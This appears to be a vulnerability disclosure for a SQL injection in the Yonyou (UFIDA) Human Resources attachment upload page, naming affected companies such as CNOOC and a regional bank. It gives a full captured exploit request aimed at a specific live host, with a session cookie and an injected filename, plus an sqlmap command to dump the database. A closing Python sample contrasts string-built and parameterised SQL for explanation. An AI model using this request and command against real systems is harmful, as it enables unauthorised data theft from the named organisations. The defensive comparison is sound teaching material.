### Summary: Generic SQL injection in the Yonyou (UFIDA) Human Resources system; many large enterprises are affected

### Details:

Affected organizations include China National Offshore Oil Corporation (CNOOC), Shunde Rural Commercial Bank, Hubei Energy Group Co., Ltd. and Huaxin Trust Co., Ltd.

The vulnerability is in the attachment upload page. Capture the request with Burp Suite and save it as post.txt:

```
POST /hrss/attach.upload.d?appName=PSNBASDOC_RM&pkAttach=0001V11000000001NLAX* HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://nc.hbny.com.cn:9090/hrss/pub/UploadAttach.jsp?appName=PSNBASDOC_RM&pkAttach=0001V11000000001NLAX
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7df36929c057c
Accept-Encoding: gzip, deflate
Host: nc.hbny.com.cn:9090
Content-Length: 507
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=0000wqBKC1wT2dZGLDkt-fcdLZZ:194gm84q8

-----------------------------7df36929c057c
Content-Disposition: form-data; name="txtFileName"; filename="0.png'"
Content-Type: image/x-png

GIF89aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
-----------------------------7df36929c057c--
```

The data can then be dumped directly with sqlmap:

```
sqlmap.py -r post.txt
```

![1.png](https://images.seebug.org/upload/201501/202158074569848f812f3bd7d410c551c3a02929.png)

Data dumped:

![2.png](https://images.seebug.org/upload/201501/2022042860b874022f1c713168e049d596f0da7d.png)

Cases:

### Proof of vulnerability:

Data dumped:

![2.png](https://images.seebug.org/upload/201501/2022042860b874022f1c713168e049d596f0da7d.png)
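As an added example (not code from the original report or from the product), the mechanism behind the finding: a minimal parser pulls the filename out of a multipart body shaped like post.txt, and the same untrusted values (the `pkAttach` parameter that sqlmap's `*` marks, and the quoted filename) are handed to a string-built INSERT versus a parameterised one against an in-memory SQLite table. The table, the parser and the query shape are assumptions, since the product's real upload handler is not on the page.

```python
import re
import sqlite3

# Constructed sample (not captured traffic): the file part of a request like the
# post.txt on this page, with sqlmap's "*" marker in pkAttach and a quote in the filename.
BOUNDARY = "---------------------------7df36929c057c"
PK_ATTACH = "0001V11000000001NLAX*"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="txtFileName"; filename="0.png\'"\r\n'
    "Content-Type: image/x-png\r\n\r\n"
    "GIF89aaaaaaaaaaaaaaaaaaaa\r\n"
    f"--{BOUNDARY}--\r\n"
)


def parse_filename(body: str, boundary: str) -> str:
    """Hypothetical minimal parser: filename of the first file part in a multipart body."""
    for part in body.split(f"--{boundary}"):
        match = re.search(r'filename="([^"]*)"', part)
        if match:
            return match.group(1)
    raise ValueError("no file part with a filename")


def _fresh_db() -> sqlite3.Connection:
    # Assumed schema standing in for the real attachment table.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE attach (pk TEXT, name TEXT)")
    return con


def store_unsafe(pk: str, name: str) -> bool:
    """String-built INSERT (assumed shape of the flawed handler). The quote in the
    filename is read as SQL syntax, not data, so the statement fails to parse;
    that parse error is the signal an injection tool builds on."""
    try:
        _fresh_db().execute(f"INSERT INTO attach VALUES ('{pk}', '{name}')")
        return True
    except sqlite3.OperationalError:
        return False


def store_safe(pk: str, name: str) -> str:
    """Parameterised INSERT: the same input is stored verbatim and never parsed as SQL."""
    con = _fresh_db()
    con.execute("INSERT INTO attach VALUES (?, ?)", (pk, name))
    return con.execute("SELECT name FROM attach WHERE pk = ?", (pk,)).fetchone()[0]


if __name__ == "__main__":
    name = parse_filename(SAMPLE_BODY, BOUNDARY)
    print(name, store_unsafe(PK_ATTACH, name), store_safe(PK_ATTACH, name))
```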